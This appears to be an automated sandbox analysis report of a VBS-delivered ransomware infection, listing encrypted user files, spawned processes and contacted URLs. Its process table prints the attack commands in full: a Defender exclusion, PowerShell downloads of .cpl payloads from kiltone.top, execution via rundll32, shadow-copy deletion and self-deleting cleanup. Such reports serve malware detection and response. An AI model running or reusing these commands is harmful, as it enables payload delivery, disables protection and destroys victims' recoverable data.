C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite-shm.pIwu
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite.ZohB
(copy)
|
OpenPGP Secret Key
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite-shm.MnmD
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite.XsHY
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shm.vAJd
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite.PZJc
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\targeting.snapshot.json.ijIb (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\times.json.NcDG (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\webappsstore.sqlite-shm.RGAt (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\webappsstore.sqlite.RTAF (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\installs.ini
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\installs.ini.jDnR (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini.xMod (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\BNAGMGSPLO.png.ldXh (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\EFOYFBOLXA.pdf.jLOH (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\GIGIYTFFYT.mp3.bozc (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\GRXZDKKVDB.png.YiBf (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\NOTIFICATION_OF_DEPENDANTS.vbs.IuxW (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\NVWZAPQSQL.jpg.hJsc (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\NVWZAPQSQL.xlsx.RMxp (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\PALRGUCVEH.jpg.sMfp (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\PALRGUCVEH.mp3.lFzB (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\PALRGUCVEH.pdf.CnYs (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\PIVFAGEAAV.docx.AvIQ (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\PIVFAGEAAV.jpg.MGpE (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\PIVFAGEAAV.xlsx.FPSw (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\PIVFAGEAAV\EIVQSAOTAQ.jpg.PqND (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\PIVFAGEAAV\NVWZAPQSQL.xlsx.DWdi (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\PIVFAGEAAV\PALRGUCVEH.pdf.obFM (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\PIVFAGEAAV\PIVFAGEAAV.docx
|
data
|
dropped
|
||
C:\Users\user\Desktop\PIVFAGEAAV\PIVFAGEAAV.docx.uOLw (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\PIVFAGEAAV\TQDFJHPUIU.png
|
data
|
dropped
|
||
C:\Users\user\Desktop\PIVFAGEAAV\TQDFJHPUIU.png.GrMv (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\PIVFAGEAAV\ZIPXYXWIOY.mp3.eaoc (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\PWCCAWLGRE.docx.UMCd (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\PWCCAWLGRE.xlsx.qxWV (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\PWCCAWLGRE\GRXZDKKVDB.png.PafQ (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\PWCCAWLGRE\NVWZAPQSQL.jpg.wmBJ (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\PWCCAWLGRE\PALRGUCVEH.mp3.rOlI (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\PWCCAWLGRE\PIVFAGEAAV.xlsx
|
data
|
dropped
|
||
C:\Users\user\Desktop\PWCCAWLGRE\PIVFAGEAAV.xlsx.LkfH (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\PWCCAWLGRE\PWCCAWLGRE.docx.Aujp (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\PWCCAWLGRE\SQSJKEBWDT.pdf.klmt (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\QCFWYSKMHA.docx.OlAT (copy)
|
OpenPGP Secret Key
|
dropped
|
||
C:\Users\user\Desktop\QCFWYSKMHA\BNAGMGSPLO.png
|
data
|
dropped
|
||
C:\Users\user\Desktop\QCFWYSKMHA\BNAGMGSPLO.png.SuBC (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\QCFWYSKMHA\PIVFAGEAAV.jpg
|
data
|
dropped
|
||
C:\Users\user\Desktop\QCFWYSKMHA\PIVFAGEAAV.jpg.Jmvl (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\QCFWYSKMHA\PWCCAWLGRE.xlsx
|
data
|
dropped
|
||
C:\Users\user\Desktop\QCFWYSKMHA\PWCCAWLGRE.xlsx.Enjo (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\QCFWYSKMHA\QCFWYSKMHA.docx
|
data
|
dropped
|
||
C:\Users\user\Desktop\QCFWYSKMHA\QCFWYSKMHA.docx.zdiR (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\QCFWYSKMHA\SQSJKEBWDT.mp3.SPqH (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\QCFWYSKMHA\SUAVTZKNFL.pdf.vgtM (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\SQSJKEBWDT.mp3
|
data
|
dropped
|
||
C:\Users\user\Desktop\SQSJKEBWDT.mp3.OCcK (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\SQSJKEBWDT.pdf.MtDa (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\SQSJKEBWDT.xlsx
|
data
|
dropped
|
||
C:\Users\user\Desktop\SQSJKEBWDT.xlsx.EZOu (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\SUAVTZKNFL.docx.DVAd (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\SUAVTZKNFL.pdf.tRzP (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\SUAVTZKNFL\EFOYFBOLXA.pdf.oSRv (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\SUAVTZKNFL\GIGIYTFFYT.mp3.VOBN (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\SUAVTZKNFL\SQSJKEBWDT.xlsx.suJP (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\SUAVTZKNFL\SUAVTZKNFL.docx.LqeT (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\SUAVTZKNFL\ZGGKNSUKOP.png.fhqW (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\TQDFJHPUIU.png.hwrj (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\ZGGKNSUKOP.png
|
data
|
dropped
|
||
C:\Users\user\Desktop\ZGGKNSUKOP.png.vzFV (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\ZIPXYXWIOY.mp3
|
data
|
dropped
|
||
C:\Users\user\Desktop\ZIPXYXWIOY.mp3.IDiG (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\BNAGMGSPLO.png.XSDv (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\EFOYFBOLXA.pdf.VaSK (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\EIVQSAOTAQ.jpg.zhAK (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\GIGIYTFFYT.mp3.wvms (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\GRXZDKKVDB.png
|
data
|
dropped
|
||
C:\Users\user\Documents\GRXZDKKVDB.png.NnMG (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\NVWZAPQSQL.jpg.EvKO (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\NVWZAPQSQL.xlsx.wUnQ (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\PALRGUCVEH.jpg.tRgo (copy)
|
OpenPGP Public Key
|
dropped
|
||
C:\Users\user\Documents\PALRGUCVEH.mp3.PlGN (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\PALRGUCVEH.pdf.FHtL (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\PIVFAGEAAV.docx.KbwQ (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\PIVFAGEAAV.jpg.tjwm (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\PIVFAGEAAV.xlsx.Hbyw (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\PIVFAGEAAV\EIVQSAOTAQ.jpg
|
data
|
dropped
|
||
C:\Users\user\Documents\PIVFAGEAAV\EIVQSAOTAQ.jpg.iujN (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\PIVFAGEAAV\NVWZAPQSQL.xlsx
|
data
|
dropped
|
||
C:\Users\user\Documents\PIVFAGEAAV\NVWZAPQSQL.xlsx.iOYd (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\PIVFAGEAAV\PALRGUCVEH.pdf.wUyz (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\PIVFAGEAAV\PIVFAGEAAV.docx
|
data
|
dropped
|
||
C:\Users\user\Documents\PIVFAGEAAV\PIVFAGEAAV.docx.KvSG (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\PIVFAGEAAV\TQDFJHPUIU.png.RMnW (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\PIVFAGEAAV\ZIPXYXWIOY.mp3
|
data
|
dropped
|
||
C:\Users\user\Documents\PIVFAGEAAV\ZIPXYXWIOY.mp3.NgTW (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\PWCCAWLGRE.docx
|
data
|
dropped
|
||
C:\Users\user\Documents\PWCCAWLGRE.docx.EoGH (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\PWCCAWLGRE.xlsx.oZBX (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\PWCCAWLGRE\GRXZDKKVDB.png
|
data
|
dropped
|
||
C:\Users\user\Documents\PWCCAWLGRE\GRXZDKKVDB.png.NFZv (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\PWCCAWLGRE\NVWZAPQSQL.jpg.FXuV (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\PWCCAWLGRE\PALRGUCVEH.mp3.PaIb (copy)
|
OpenPGP Public Key
|
dropped
|
||
C:\Users\user\Documents\PWCCAWLGRE\PIVFAGEAAV.xlsx
|
data
|
dropped
|
||
C:\Users\user\Documents\PWCCAWLGRE\PIVFAGEAAV.xlsx.CQOT (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\PWCCAWLGRE\PWCCAWLGRE.docx.SojF (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\PWCCAWLGRE\SQSJKEBWDT.pdf
|
data
|
dropped
|
||
C:\Users\user\Documents\PWCCAWLGRE\SQSJKEBWDT.pdf.AnJD (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\QCFWYSKMHA.docx.sCGS (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\QCFWYSKMHA\BNAGMGSPLO.png.aTSz (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\QCFWYSKMHA\PIVFAGEAAV.jpg.KCBF (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\QCFWYSKMHA\PWCCAWLGRE.xlsx.yYLv (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\QCFWYSKMHA\QCFWYSKMHA.docx.OjRs (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\QCFWYSKMHA\SQSJKEBWDT.mp3.ZUJd (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\QCFWYSKMHA\SUAVTZKNFL.pdf
|
OpenPGP Secret Key
|
dropped
|
||
C:\Users\user\Documents\QCFWYSKMHA\SUAVTZKNFL.pdf.ybWi (copy)
|
OpenPGP Secret Key
|
dropped
|
||
C:\Users\user\Documents\SQSJKEBWDT.mp3.VCiM (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\SQSJKEBWDT.pdf.zSBT (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\SQSJKEBWDT.xlsx
|
data
|
dropped
|
||
C:\Users\user\Documents\SQSJKEBWDT.xlsx.ydFM (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\SUAVTZKNFL.docx.Kder (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\SUAVTZKNFL.pdf
|
data
|
dropped
|
||
C:\Users\user\Documents\SUAVTZKNFL.pdf.JehM (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\SUAVTZKNFL\EFOYFBOLXA.pdf.xEHd (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\SUAVTZKNFL\GIGIYTFFYT.mp3.FDkK (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\SUAVTZKNFL\PALRGUCVEH.jpg
|
data
|
dropped
|
||
C:\Users\user\Documents\SUAVTZKNFL\PALRGUCVEH.jpg.aLnb (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\SUAVTZKNFL\SQSJKEBWDT.xlsx.qAjI (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\SUAVTZKNFL\SUAVTZKNFL.docx.fCTX (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\SUAVTZKNFL\ZGGKNSUKOP.png
|
data
|
dropped
|
||
C:\Users\user\Documents\SUAVTZKNFL\ZGGKNSUKOP.png.hjST (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\TQDFJHPUIU.png.FvUn (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\ZGGKNSUKOP.png
|
data
|
dropped
|
||
C:\Users\user\Documents\ZGGKNSUKOP.png.AzRi (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\ZIPXYXWIOY.mp3
|
data
|
dropped
|
||
C:\Users\user\Documents\ZIPXYXWIOY.mp3.WNwU (copy)
|
data
|
dropped
|
||
C:\Users\user\Downloads\3e6b5c7a-f1f6-4521-b38a-41e203df3636.tmp
|
PDF document, version 1.6 (zip deflate encoded)
|
dropped
|
||
C:\Users\user\Downloads\BNAGMGSPLO.png.BbGl (copy)
|
data
|
dropped
|
||
C:\Users\user\Downloads\EFOYFBOLXA.pdf.AJnS (copy)
|
data
|
dropped
|
||
C:\Users\user\Downloads\EIVQSAOTAQ.jpg.xWDr (copy)
|
data
|
dropped
|
||
C:\Users\user\Downloads\GIGIYTFFYT.mp3.hNPO (copy)
|
OpenPGP Secret Key Version 2
|
dropped
|
||
C:\Users\user\Downloads\GRXZDKKVDB.png.DSvz (copy)
|
data
|
dropped
|
||
C:\Users\user\Downloads\NVWZAPQSQL.jpg.jXxe (copy)
|
data
|
dropped
|
||
C:\Users\user\Downloads\NVWZAPQSQL.xlsx.PzTr (copy)
|
data
|
dropped
|
||
C:\Users\user\Downloads\PALRGUCVEH.jpg.urqX (copy)
|
PGP Secret Sub-key -
|
dropped
|
||
C:\Users\user\Downloads\PALRGUCVEH.mp3
|
data
|
dropped
|
||
C:\Users\user\Downloads\PALRGUCVEH.mp3.ceXj (copy)
|
data
|
dropped
|
||
C:\Users\user\Downloads\PALRGUCVEH.pdf.DhmR (copy)
|
data
|
dropped
|
||
C:\Users\user\Downloads\PIVFAGEAAV.docx
|
data
|
dropped
|
||
C:\Users\user\Downloads\PIVFAGEAAV.docx.uTlg (copy)
|
data
|
dropped
|
||
C:\Users\user\Downloads\PIVFAGEAAV.jpg.sKAN (copy)
|
data
|
dropped
|
||
C:\Users\user\Downloads\PIVFAGEAAV.xlsx.VQca (copy)
|
data
|
dropped
|
||
C:\Users\user\Downloads\PWCCAWLGRE.docx
|
data
|
dropped
|
||
C:\Users\user\Downloads\PWCCAWLGRE.docx.Kpro (copy)
|
data
|
dropped
|
||
C:\Users\user\Downloads\PWCCAWLGRE.xlsx
|
data
|
dropped
|
||
C:\Users\user\Downloads\PWCCAWLGRE.xlsx.dYKD (copy)
|
data
|
dropped
|
||
C:\Users\user\Downloads\QCFWYSKMHA.docx
|
data
|
dropped
|
||
C:\Users\user\Downloads\QCFWYSKMHA.docx.kieO (copy)
|
data
|
dropped
|
||
C:\Users\user\Downloads\SQSJKEBWDT.mp3.DTCV (copy)
|
data
|
dropped
|
||
C:\Users\user\Downloads\SQSJKEBWDT.pdf.jsez (copy)
|
data
|
dropped
|
||
C:\Users\user\Downloads\SUAVTZKNFL.docx.HzwX (copy)
|
data
|
dropped
|
||
C:\Users\user\Downloads\SUAVTZKNFL.pdf.ykDd (copy)
|
data
|
dropped
|
||
C:\Users\user\Downloads\TQDFJHPUIU.png
|
data
|
dropped
|
||
C:\Users\user\Downloads\TQDFJHPUIU.png.XQDF (copy)
|
data
|
dropped
|
||
C:\Users\user\Downloads\ZGGKNSUKOP.png.YClX (copy)
|
data
|
dropped
|
||
C:\Users\user\Downloads\ZIPXYXWIOY.mp3.baRA (copy)
|
data
|
dropped
|
||
C:\Users\user\Downloads\be032c20-43a3-4996-a07b-7fbdcff774d3.tmp
|
PDF document, version 1.6 (zip deflate encoded)
|
dropped
|
||
C:\Users\user\Downloads\downloaded.pdf.crdownload
|
PDF document, version 1.6 (zip deflate encoded)
|
dropped
|
||
C:\Users\user\Downloads\downloaded.pdf.qUDX (copy)
|
data
|
dropped
|
||
C:\Users\user\Favorites\Amazon.url.rdDs (copy)
|
data
|
dropped
|
||
C:\Users\user\Favorites\Bing.url.VbmB (copy)
|
data
|
dropped
|
||
C:\Users\user\Favorites\Facebook.url.fOSa (copy)
|
data
|
dropped
|
||
C:\Users\user\Favorites\Google.url.tKbU (copy)
|
data
|
dropped
|
||
C:\Users\user\Favorites\Live.url.LYbX (copy)
|
data
|
dropped
|
||
C:\Users\user\Favorites\NYTimes.url.Tdnf (copy)
|
data
|
dropped
|
||
C:\Users\user\Favorites\Reddit.url
|
data
|
dropped
|
||
C:\Users\user\Favorites\Reddit.url.YFaU (copy)
|
data
|
dropped
|
||
C:\Users\user\Favorites\Twitter.url.JYZb (copy)
|
data
|
dropped
|
||
C:\Users\user\Favorites\Wikipedia.url.HkqY (copy)
|
data
|
dropped
|
||
C:\Users\user\Favorites\Youtube.url.cmae (copy)
|
data
|
dropped
|
||
C:\Users\user\Searches\winrt--{S-1-5-21-2246122658-3693405117-2476756634-1003}-.searchconnector-ms.dfXP (copy)
|
data
|
dropped
|
||
C:\Users\user\ntuser.ini.deyZ (copy)
|
data
|
dropped
|
||
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
|
JSON data
|
dropped
|
||
Chrome Cache Entry: 625
|
HTML document, ASCII text, with very long lines (6862)
|
downloaded
|
||
Chrome Cache Entry: 626
|
PDF document, version 1.6 (zip deflate encoded)
|
downloaded
|
||
\Device\Null
|
ASCII text, with CRLF line terminators
|
dropped
|
There are 796 hidden files, click here to show them.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\NOTIFICATION_OF_DEPENDANTS.vbs"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp'
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c powershell start-process https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdf
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell start-process https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdf
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.cpl -Outfile $env:tmp\\fjeljies.cpl
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.cpl -Outfile $env:tmp\\fjeljies.cpl
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c control C:\Users\user\AppData\Local\Temp/fjeljies.cpl
|
||
C:\Windows\System32\rundll32.exe
|
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL C:\Users\user\AppData\Local\Temp/fjeljies.cpl
|
||
C:\Windows\SysWOW64\rundll32.exe
|
"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 C:\Users\user\AppData\Local\Temp/fjeljies.cpl
|
||
C:\Windows\SysWOW64\cmd.exe
|
cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"
|
||
C:\Windows\SysWOW64\cmd.exe
|
cmd /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe
|
||
C:\Windows\SysWOW64\cmd.exe
|
cmd /c %temp%/eryy65ty.exe
|
||
C:\Users\user\AppData\Local\Temp\eryy65ty.exe
|
C:\Users\user\AppData\Local\Temp/eryy65ty.exe
|
||
C:\Windows\System32\wbem\WMIC.exe
|
c:\shCUqe\shCU\..\..\Windows\shCU\shCU\..\..\system32\shCU\shCU\..\..\wbem\shCU\shCUq\..\..\wmic.exe shadowcopy delete
|
||
C:\Users\user\AppData\Local\Temp\eryy65ty.exe
|
"C:\Users\user\AppData\Local\Temp\eryy65ty.exe"
|
||
C:\Windows\System32\wbem\WMIC.exe
|
c:\fPLdrv\fPLd\..\..\Windows\fPLd\fPLd\..\..\system32\fPLd\fPLd\..\..\wbem\fPLd\fPLdr\..\..\wmic.exe shadowcopy delete
|
||
C:\Users\user\AppData\Local\Temp\eryy65ty.exe
|
"C:\Users\user\AppData\Local\Temp\eryy65ty.exe"
|
||
C:\Windows\System32\wbem\WMIC.exe
|
c:\gNJiqW\gNJi\..\..\Windows\gNJi\gNJi\..\..\system32\gNJi\gNJi\..\..\wbem\gNJi\gNJiq\..\..\wmic.exe shadowcopy delete
|
||
C:\Windows\System32\wbem\WMIC.exe
|
c:\SmbaZD\Smba\..\..\Windows\Smba\Smba\..\..\system32\Smba\Smba\..\..\wbem\Smba\SmbaZ\..\..\wmic.exe shadowcopy delete
|
||
C:\Windows\SysWOW64\cmd.exe
|
cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\user\AppData\Local\Temp\eryy65ty.exe"
|
||
C:\Windows\SysWOW64\PING.EXE
|
ping 1.1.1.1 -n 1 -w 3000
|
||
C:\Windows\System32\wbem\WMIC.exe
|
c:\VhJyqT\VhJy\..\..\Windows\VhJy\VhJy\..\..\system32\VhJy\VhJy\..\..\wbem\VhJy\VhJyq\..\..\wmic.exe shadowcopy delete
|
||
C:\Windows\SysWOW64\cmd.exe
|
cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\user\AppData\Local\Temp\eryy65ty.exe"
|
||
C:\Windows\SysWOW64\PING.EXE
|
ping 1.1.1.1 -n 1 -w 3000
|
||
C:\Windows\System32\wbem\WMIC.exe
|
c:\EpadjY\Epad\..\..\Windows\Epad\Epad\..\..\system32\Epad\Epad\..\..\wbem\Epad\Epadj\..\..\wmic.exe shadowcopy delete
|
||
C:\Windows\SysWOW64\cmd.exe
|
cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\user\AppData\Local\Temp\eryy65ty.exe"
|
||
C:\Windows\SysWOW64\PING.EXE
|
ping 1.1.1.1 -n 1 -w 3000
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdf
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US
--service-sandbox-type=none --mojo-platform-channel-handle=2120 --field-trial-handle=2016,i,7727071625406285567,4283038652588127997,262144
--disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction
/prefetch:8
|
||
C:\Windows\System32\svchost.exe
|
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\control.exe
|
control C:\Users\user\AppData\Local\Temp/fjeljies.cpl
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\notepad.exe
|
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Decryptfiles.txt
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
There are 40 hidden processes, click here to show them.
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
https://kiltone.top/ste
|
unknown
|
||
https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdf
|
|||
https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b443
|
unknown
|
||
https://kiltone.top/stelin/Gosjeufon.cpl
|
45.125.67.168
|
||
https://kiltone.top/stelin/rwcla.cpl
|
45.125.67.168
|
||
https://www.oldmutual.co.za/v3/assets/blt0
|
unknown
|
||
https://kiltone.top/stelin/rwcla.
|
unknown
|
||
https://www.avito.ru/
|
unknown
|
||
https://tse1.mm.bing.net/th?id=OADD2.10239381138051_1QKM3152ZV6SHG2T8&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
|
150.171.27.10
|
||
https://digify.com/a/#/access/login
|
unknown
|
||
https://www.ctrip.com/
|
unknown
|
||
https://www.leboncoin.fr/
|
unknown
|
||
https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
|
unknown
|
||
https://kiltone.top/stelin/Gosjeufon.cpl-Outfile$env:tmp
|
unknown
|
||
